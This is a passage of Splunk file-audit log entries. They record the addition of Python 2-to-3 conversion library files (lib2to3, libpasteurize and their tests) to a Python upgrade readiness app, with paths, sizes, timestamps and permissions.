gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.723, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_getcwd.py", isdir=0, size=873, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.719, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_future_builtins.py", isdir=0, size=1450, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.715, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_fullargspec.py", isdir=0, size=438, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.712, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_features.py", isdir=0, size=2675, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.708, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_division.py", isdir=0, size=904, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.704, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_annotations.py", isdir=0, size=1581, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.701, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_add_future_standard_library_import.py", isdir=0, size=663, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.697, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_add_all_future_builtins.py", isdir=0, size=1269, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.694, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_add_all__future__imports.py", isdir=0, size=676, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.690, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/feature_base.py", isdir=0, size=1723, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.687, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/__init__.py", isdir=0, size=3719, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.481, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/main.py", isdir=0, size=8186, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.478, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.474, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/__init__.py", isdir=0, size=31, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.471, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/splunk_py2to3/fixes/fix_spl_unicode.py", isdir=0, size=387, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.467, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/splunk_py2to3/fixes/fix_spl_ospath.py", isdir=0, size=6656, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.462, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/splunk_py2to3/fixes/fix_spl_floor.py", isdir=0, size=1893, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.458, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/splunk_py2to3/fixes/fix_spl_ceil.py", isdir=0, size=1875, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.454, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/splunk_py2to3/fixes/__init__.py", isdir=0, size=47, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.349, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/splunk_py2to3/testPy2to3_2.py", isdir=0, size=24, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.345, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/splunk_py2to3/testPy2to3.py", isdir=0, size=43, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.341, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/splunk_py2to3/lib2to3Runner.py", isdir=0, size=3166, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.337, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/splunk_py2to3/fixes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.333, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/splunk_py2to3/__init__.py", isdir=0, size=47, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.329, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_zip.py", isdir=0, size=904, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.326, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_xreadlines.py", isdir=0, size=690, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.323, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_xrange.py", isdir=0, size=2699, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.319, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_ws_comma.py", isdir=0, size=1095, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.314, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_urllib.py", isdir=0, size=8385, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.310, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_unicode.py", isdir=0, size=1269, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.307, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_types.py", isdir=0, size=1809, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.303, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_tuple_params.py", isdir=0, size=5577, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.299, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_throw.py", isdir=0, size=1586, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.293, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_sys_exc.py", isdir=0, size=1039, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.288, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_standarderror.py", isdir=0, size=450, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.284, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_set_literal.py", isdir=0, size=1699, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.281, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_repr.py", isdir=0, size=614, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.277, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_renames.py", isdir=0, size=2218, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.273, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_reduce.py", isdir=0, size=839, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.270, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_raw_input.py", isdir=0, size=455, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.265, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_raise.py", isdir=0, size=2934, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.261, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_print.py", isdir=0, size=2865, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.257, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_paren.py", isdir=0, size=1228, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.251, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_operator.py", isdir=0, size=3472, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.245, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_numliterals.py", isdir=0, size=773, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.241, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_nonzero.py", isdir=0, size=598, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.237, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_next.py", isdir=0, size=3181, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.233, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_ne.py", isdir=0, size=573, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.227, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_methodattrs.py", isdir=0, size=615, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.223, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_metaclass.py", isdir=0, size=8216, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.215, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_map.py", isdir=0, size=3062, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.211, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_long.py", isdir=0, size=477, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.207, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_itertools_imports.py", isdir=0, size=2094, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.203, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_itertools.py", isdir=0, size=1550, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.199, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_isinstance.py", isdir=0, size=1609, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.195, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_intern.py", isdir=0, size=1866, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.191, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_input.py", isdir=0, size=710, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.187, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_imports2.py", isdir=0, size=289, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.182, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_imports.py", isdir=0, size=5693, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.178, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_import.py", isdir=0, size=3260, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.173, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_idioms.py", isdir=0, size=4891, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.169, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_has_key.py", isdir=0, size=3227, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.164, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_getcwdu.py", isdir=0, size=452, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.160, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_future.py", isdir=0, size=547, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.154, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_funcattrs.py", isdir=0, size=645, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.149, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_filter.py", isdir=0, size=2107, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.144, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_exitfunc.py", isdir=0, size=2503, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.139, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_execfile.py", isdir=0, size=2056, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.134, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_exec.py", isdir=0, size=1002, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.130, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_except.py", isdir=0, size=3352, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.126, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_dict.py", isdir=0, size=3824, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.121, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_buffer.py", isdir=0, size=591, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.116, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_basestring.py", isdir=0, size=321, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.112, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_asserts.py", isdir=0, size=984, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.108, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/fix_apply.py", isdir=0, size=2433, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.104, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes/__init__.py", isdir=0, size=47, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.597, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/fixers/myfixes/fix_preorder.py", isdir=0, size=127, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.593, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/fixers/myfixes/fix_parrot.py", isdir=0, size=347, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.588, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/fixers/myfixes/fix_last.py", isdir=0, size=125, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.582, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/fixers/myfixes/fix_first.py", isdir=0, size=124, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.578, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/fixers/myfixes/fix_explicit.py", isdir=0, size=123, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.573, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/fixers/myfixes/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.568, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/fixers/parrot_example.py", isdir=0, size=23, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.563, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/fixers/no_fixer_cls.py", isdir=0, size=75, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.559, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/fixers/myfixes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.555, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/fixers/bad_order.py", isdir=0, size=89, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.450, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/py3_test_grammar.py", isdir=0, size=30362, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.446, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/py2_test_grammar.py", isdir=0, size=30980, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.442, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/infinite_recursion.py", isdir=0, size=93071, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.439, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/fixers", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.434, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/false_encoding.py", isdir=0, size=40, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.431, user=n/a, 